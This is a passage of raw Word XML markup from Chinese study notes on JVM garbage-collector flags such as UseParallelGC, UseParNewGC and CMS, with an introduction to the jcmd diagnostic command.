        <w:t>使用何种垃圾回收器？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00925C72" w:rsidRDefault="001B439C" w:rsidP="001B439C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00925C72" w:rsidRPr="00925C72">
        <w:t>-XX:+UseParallelGC</w:t>
      </w:r>
      <w:r w:rsidR="00925C72" w:rsidRPr="00925C72">
        <w:t>：选择垃圾收集器为并行收集器。此配置仅对年轻代有效。可以同时并行多个垃圾收集线程，但此时用户线程必须停止。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B439C" w:rsidRDefault="00925C72" w:rsidP="001B439C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新生代采用</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ParNew</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集器：使用多线程进行垃圾回收，其余行为与</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Serial</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集器是一样的。</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ParNew</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集器是</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式下虚拟机中首选的</w:t>
      </w:r>
      <w:r w:rsidR="001B439C" w:rsidRPr="00446D6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>新生代收集器</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ParNew</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集器是使用</w:t>
      </w:r>
      <w:r w:rsidR="001B439C" w:rsidRPr="00CE375E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>–XX:+UseConcMarkSweepGC</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>选项后的</w:t>
      </w:r>
      <w:r w:rsidR="001B439C" w:rsidRPr="00CE375E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>默认新生代收集器</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，也可以使用</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-XX</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UseParNewGC</w:t>
      </w:r>
      <w:r w:rsidR="001B439C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>选项强制指定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F20BF1" w:rsidRDefault="00F20BF1" w:rsidP="00F20BF1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可通过在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JVM </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数中设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-XX:UseConcMarkSweepGC </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来使用此收集器</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>不过此收集器仅用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>old</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Perm(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>永生</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>的对象收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E3E2A" w:rsidRDefault="000E3E2A" w:rsidP="00F20BF1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000E3E2A" w:rsidRPr="000E3E2A" w:rsidRDefault="000E3E2A" w:rsidP="000E3E2A">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>---------------------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E3E2A" w:rsidRPr="000E3E2A" w:rsidRDefault="000E3E2A" w:rsidP="000E3E2A">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-XX:+UseParallelGC：选择垃圾收集器为并行收集器。此配置仅对年轻代有效。可以同时并行多个垃圾收集线程，但此时用户线程必须停止。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E3E2A" w:rsidRPr="000E3E2A" w:rsidRDefault="000E3E2A" w:rsidP="000E3E2A">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-XX:+UseParNewGC:设置年轻代为多线程收集。可与CMS收集同时使用。在serial基础上实现的多线程收集器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E3E2A" w:rsidRPr="000E3E2A" w:rsidRDefault="000E3E2A" w:rsidP="000E3E2A">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-----------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E3E2A" w:rsidRPr="000E3E2A" w:rsidRDefault="000E3E2A" w:rsidP="000E3E2A">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-XX:+UseParallelGC</w:t>
      </w:r>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">指 定在 New Generation 使用 parallel collector, 并行收集 , 暂停 app threads, 同时启动多个垃圾回收 thread, </w:t>
      </w:r>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不能和 CMS gc 一起使用</w:t>
      </w:r>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> . 系统吨吐量优先 , 但是会有较长长时间的 app pause, 后台系统任务可以使用此 gc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E3E2A" w:rsidRDefault="000E3E2A" w:rsidP="000E3E2A">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-XX:+UseParNewGC</w:t>
      </w:r>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">指定在 New Generation 使用 parallel collector, </w:t>
      </w:r>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是 UseParallelGC 的 gc 的升级版本</w:t>
      </w:r>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> , 有更好的性能或者优点 , 可以和 CMS gc 一起使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E3E2A" w:rsidRPr="000E3E2A" w:rsidRDefault="000E3E2A" w:rsidP="000E3E2A">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3E2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>两个都是年轻代的GC，也都是并行GC，区别就是，parallel gc 是提升吞吐量，parnew gc是serial gc的多线程版</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E3E2A" w:rsidRPr="000E3E2A" w:rsidRDefault="000E3E2A" w:rsidP="000E3E2A">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000E3E2A" w:rsidRPr="000E3E2A" w:rsidRDefault="000E3E2A" w:rsidP="00F20BF1"/>
    <w:p w:rsidR="00F20BF1" w:rsidRPr="00F20BF1" w:rsidRDefault="00F20BF1" w:rsidP="001B439C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E34A6D" w:rsidRDefault="00E34A6D" w:rsidP="00E34A6D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2.5.4 jcmd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E34A6D" w:rsidRPr="00D5433C" w:rsidRDefault="00D5433C" w:rsidP="00E34A6D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D5433C">
        <w:t>jcmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5433C">
        <w:t>用于向正在运行的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5433C">
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5433C">
        <w:t>发送诊断信息请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5433C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5433C">
        <w:t>是从</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5433C">
        <w:t>JDK1.7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5433C">
        <w:t>开始提供可以说是</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2CB1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>jstack</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2CB1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2CB1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>jps</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2CB1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>的结合体</w:t>
      </w:r>
      <w:r w:rsidR="00BE65A7" w:rsidRPr="003C2CB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5433C" w:rsidRDefault="00DD2B94" w:rsidP="00DD2B94">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE7D76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">jcmd </w:t>
      </w:r>
      <w:r w:rsidR="00FE7D76">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00FE7D76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">l: </w:t>
      </w:r>
      <w:r w:rsidR="00FE7D76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看进程</w:t>
      </w:r>
      <w:r w:rsidR="00FE7D76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE7D76" w:rsidRDefault="00FE7D76" w:rsidP="00FE7D76">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4854753" cy="2125866"/>
            <wp:effectExtent l="19050" t="0" r="2997" b="0"/>
            <wp:docPr id="24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6" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4854472" cy="2125743"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2B94" w:rsidRPr="00E34A6D" w:rsidRDefault="00DD2B94" w:rsidP="00DD2B94">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD2B94" w:rsidRDefault="00DD2B94" w:rsidP="00925C72">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="line"/>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">jcmd pid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line"/>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VM.flags</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00925C72" w:rsidRDefault="00925C72" w:rsidP="00925C72">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="684532"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="24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7" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="684532"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
